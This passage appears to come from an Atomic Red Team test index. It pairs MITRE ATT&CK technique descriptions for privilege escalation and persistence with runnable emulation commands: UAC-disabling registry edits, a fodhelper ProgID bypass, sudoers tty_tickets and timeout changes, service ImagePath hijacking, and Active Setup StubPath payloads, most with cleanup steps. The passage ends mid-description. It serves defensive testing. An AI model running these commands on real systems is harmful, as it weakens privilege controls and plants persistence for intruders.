privileges. [Article](https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/)
'
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify
/t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify
/t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Disable ConsentPromptBehaviorAdmin via registry keys
auto_generated_guid: a768aaa2-2442-475c-8990-69cf33af0f4e
description: 'This atomic regarding setting ConsentPromptBehaviorAdmin to 0
configures the UAC so that it does not prompt for consent or credentials when
actions requiring elevated privileges are performed by users in the administrators
group. This means that any operation that would normally trigger a UAC prompt
will proceed automatically without user interaction.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
/v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
/v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
'
name: command_prompt
- name: UAC bypassed by Utilizing ProgIDs registry.
auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
description: 'This atomic designed to simulate the UAC bypassed made by ValleyRAT
by adding customized ProgIDs registry entry.
'
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
name: command_prompt
T1548.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0
created: '2020-01-30T14:34:44.992Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/003
external_id: T1548.003
- source_name: sudo man page 2018
description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.
url: https://www.sudo.ws/
- source_name: OSX.Dok Malware
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
- source_name: cybereason osx proton
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:26.105Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '1.1'
identifier: T1548.003
atomic_tests:
- name: Sudo usage
auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- macos
- linux
executor:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
- name: Sudo usage (freebsd)
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- macos
- linux
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
- name: Unlimited sudo cache timeout (freebsd)
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
sudo visudo -c -f /usr/local/etc/sudoers
- name: Disable tty_tickets for sudo caching
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- macos
- linux
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching (freebsd)
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
sudo visudo -c -f /usr/local/etc/sudoers
T1574.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c
created: '2020-03-13T11:42:14.444Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/011
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
September 12, 2024."
url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
url: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
- source_name: hexacorn
description: hexacorn. (2015, January 13). Beyond good ol’ Run key, Part 24.
Retrieved September 25, 2025.
url: https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
- source_name: Kansa Service related collectors
description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and
analysis. Retrieved October 10, 2019.'
url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
- source_name: malware_hides_service
description: Lawrence Abrams. (2004, September 10). How Malware hides and
is installed as a Service. Retrieved August 30, 2021.
url: https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
- source_name: Autoruns for Windows
description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96.
Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- source_name: MDSec
description: MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September
25, 2025.
url: https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/
- source_name: Registry Key Security
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
Retrieved March 16, 2017.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
- source_name: microsoft_services_registry_tree
description: Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services
Registry Tree. Retrieved August 25, 2021.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
- source_name: gendigital
description: 'Threat Research Team. (2022, March 22). Operation Dragon Castling:
APT group targeting betting companies. Retrieved September 25, 2025.'
url: https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:27.075Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the Parameters key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the Parameters key of a given services registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.
For example, the registry path(Citation: MDSec) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters(Citation: hexacorn)(Citation: gendigital) contains the AutodiaDLL value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the AutodiaDLL to point to a hijacked or malicious DLL:
"AutodialDLL"="c:\temp\foo.dll"
This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
- Joe Gumke, U.S. Bank
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
description: |
Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service check
type: string
default: weakservicename
executor:
command: |
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
name: powershell
- name: Service ImagePath Change with reg.exe
auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
'
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service name
type: string
default: calcservice
weak_service_path:
description: weak service path
type: string
default: "%windir%\\system32\\win32calc.exe"
malicious_service_path:
description: malicious service path
type: string
default: "%windir%\\system32\\cmd.exe"
dependency_executor_name: powershell
dependencies:
- description: 'The service must exist (#{weak_service_name})
'
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
'
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
'
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
'
cleanup_command: 'sc.exe delete #{weak_service_name}
'
name: command_prompt
T1547:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
created: '2020-01-23T17:46:59.535Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547
external_id: T1547
- source_name: Cylance Reg Persistence Sept 2013
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024.'
url: https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- source_name: MSDN Authentication Packages
description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
12, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
- source_name: Linux Kernel Programming
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:29.846Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network Devices
x_mitre_version: '1.3'
identifier: T1547
atomic_tests:
- name: Add a driver
auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
description: 'Install a driver via pnputil.exe lolbin
'
supported_platforms:
- windows
input_arguments:
driver_inf:
description: A built-in, already installed windows driver inf
type: path
default: C:\Windows\INF\usbstor.inf
executor:
command: 'pnputil.exe /add-driver "#{driver_inf}"
'
name: command_prompt
- name: Driver Installation Using pnputil.exe
auto_generated_guid: 5cb0b071-8a5a-412f-839d-116beb2ed9f7
description: 'pnputil.exe is a native command-line utility in Windows to install
drivers, this can be abused by to install malicious drivers. Ref: https://lolbas-project.github.io/lolbas/Binaries/Pnputil/
'
supported_platforms:
- windows
input_arguments:
driver_path:
description: Enter the driver file path to install (Default is used built-in
windows driver - acpipmi.inf)
type: path
default: C:\Windows\INF\acpipmi.inf
executor:
command: 'pnputil.exe -i -a #{driver_path}
'
name: powershell
- name: Leverage Virtual Channels to execute custom DLL during successful RDP
session
auto_generated_guid: fdd45306-74f6-4ade-9a97-0a4895961228
description: "Virtual Channels can be leveraged to alter RDP behavior using
dedicated Addins.The mechanism is implemented using DLLs which can be executed
during RDP session automatically. \nThe DLLs are loaded in the host system
only after successful connection is established with the remote system.\nOnce
the test is run, amsi.dll will be loaded on the host system during successful
RDP session.\nBlog :https://learn.microsoft.com/en-us/windows/win32/termserv/terminal-services-virtual-channels?redirectedfrom=MSDN\n"
supported_platforms:
- windows
input_arguments:
Subkey_Added:
description: New Sub key added in the registry path
type: String
default: Malware
dll_inf:
description: custom DLL to be executed
type: Path
default: C:\Windows\System32\amsi.dll
executor:
command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\Addins\#{Subkey_Added}"
/v Name /t REG_SZ /d "#{dll_inf}" /f
'
cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal
Server Client\Default\Addins\#{Subkey_Added}" /f '
name: command_prompt
elevation_required: true
T1547.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--22522668-ddf6-470b-a027-9d6866679f67
created: '2020-12-18T16:33:13.098Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/014
external_id: T1547.014
- source_name: SECURELIST Bright Star 2015
description: Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really
Spreading through the Bright Star?. Retrieved December 18, 2020.
url: https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
- source_name: Mandiant Glyer APT 2010
description: Glyer, C. (2010). Examples of Recent APT Persistence Mechanism.
Retrieved December 18, 2020.
url: https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf
- source_name: FireEye CFR Watering Hole 2012
description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
- source_name: Klein Active Setup 2010
description: Klein, H. (2010, April 22). Active Setup Explained. Retrieved
December 18, 2020.
url: https://helgeklein.com/blog/2010/04/active-setup-explained/
- source_name: paloalto Tropic Trooper 2016
description: Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese
Government and Fossil Fuel Provider With Poison Ivy. Retrieved December
18, 2020.
url: https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: Citizenlab Packrat 2015
description: Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved
December 18, 2020.
url: https://citizenlab.ca/2015/12/packrat-report/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:31.226Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1547.014
atomic_tests:
- name: HKLM - Add atomic_test key to launch executable as part of user setup
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
Setup\\Installed Components' to launch calc by configuring an active setup
executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
run during the next logon for each user.\n\nNote: If you logout before running
the cleanup command, you will be required to go through the OOBE (out-of-box
experience) setup sequence to log back in. \nThe payload will only run once
unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
supported_platforms:
- windows
input_arguments:
payload:
description: Payload to run once during login
type: string
default: C:\Windows\System32\calc.exe
executor:
command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
-Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
\"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
\"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
/AlternateShellStartup"
cleanup_command: |-
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: HKLM - Add malicious StubPath value to existing Active Setup Entry
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
description: "This test will add a StubPath entry to the Active Setup native
registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
\nSaid key doesn't have a StubPath value by default, by adding one it will
launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
\nWithout the last command it will normally run on next user logon. Note:
this test will only run once successfully if no cleanup command is run in
between test.\n"
supported_platforms:
- windows
input_arguments:
payload:
description: Payload to run once during login
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |-
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
cleanup_command: |-
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
name: powershell
elevation_required: true
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
version number
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
description: "This test will decrease the version number of the 'Internet Explorer
Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
supported_platforms:
- windows
executor:
command: |
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
name: powershell
elevation_required: true
T1484.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee
created: '2020-12-28T21:59:02.181Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
- source_name: AWS RE:Inforce Threat Detection 2024
description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
techniques for proactive threat detection. Retrieved September 25, 2024.
url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a
- source_name: AADInternals zure AD Federated Domain
description: Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability
in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.
url: https://o365blog.com/post/federation-vulnerability/
- source_name: Microsoft - Azure AD Federation
description: Microsoft. (2018, November 28). What is federation with Azure
AD?. Retrieved December 30, 2020.
url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
- source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods
description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved
December 30, 2020.
url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
- source_name: Microsoft - Update or Repair Federated domain
description: Microsoft. (2020, September 14). Update or repair the settings
of a federated domain in Office 365, Azure, or Intune. Retrieved December
30, 2020.
url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365
- source_name: Okta Cross-Tenant Impersonation 2023
description: 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant
Impersonation: Prevention and Detection. Retrieved February 15, 2024.'
url: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved November 17, 2024.
url: https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:32.244Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
between domains and tenants to evade defenses and/or elevate privileges.Trust
details, such as whether or not user identities are federated, allow authentication
and authorization properties to apply between domains or tenants for the purpose
of accessing shared resources.(Citation: Microsoft - Azure AD Federation)
These trust objects may include accounts, credentials, and other authentication
material applied to servers, tokens, and domains.\n\nManipulating these trusts
may allow an adversary to escalate privileges and/or evade defenses by modifying
settings to add objects which they control. For example, in Microsoft Active
Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002)
